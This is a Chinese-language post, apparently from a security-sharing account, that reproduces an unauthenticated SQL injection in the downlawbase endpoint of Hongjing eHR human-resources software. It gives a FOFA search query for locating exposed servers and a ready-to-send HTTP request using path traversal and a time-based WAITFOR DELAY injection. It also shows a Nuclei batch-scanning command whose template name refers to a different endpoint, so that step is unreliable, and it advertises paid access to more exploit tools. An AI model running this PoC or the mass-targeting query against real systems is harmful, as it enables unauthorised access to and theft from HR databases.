宏景eHR downlawbase SQL注入漏洞复现

0x01 免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！！！

0x02 产品介绍

宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合，满足动态化、协同化、流程化、战略化需求的软件。面向复杂单组织或多组织客户，支持流程，B/S架构。特别适合集团化管理和跨地域使用的产品，融合了最新的互联网技术和先进的人力资源管理理念和实践，更好地支持异地办公和网上流程，加强了人力资源业务的集中管理和协同，支持集团管控、目标管理、领导决策等应用。HJ-eHR主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理，以及人事、绩效、培训、招聘、考勤等业务自助，还具备了报表功能和灵活的表格工具，支持集团管控、目标管理、领导决策等应用。

0x03 漏洞威胁

宏景eHR downlawbase 接口处存在SQL注入漏洞，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令，从而窃取数据库敏感信息。

0x04 漏洞环境

FOFA：

app="HJSOFT-HCM"

0x05 漏洞复现

POC

GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

延时5秒

0x06 批量验证脚本

Nuclei验证脚本已发布
知识星球：冷漠安全

./nuclei -t dh-getNewStaypointDetailQuery-sql.yaml -l dh-getNewStaypointDetailQuery-sql.txt

0x07 修复建议

目前软件已发布安全修复更新，受影响用户可以联系厂商获取补丁。

http://www.hjsoft.com.cn/#/

漏洞详情及批量检测POC工具请前往知识星球获取
知识星球：冷漠安全
限时优惠券：加入立减25
星球福利：每天更新最新漏洞POC、资料文献、内部工具等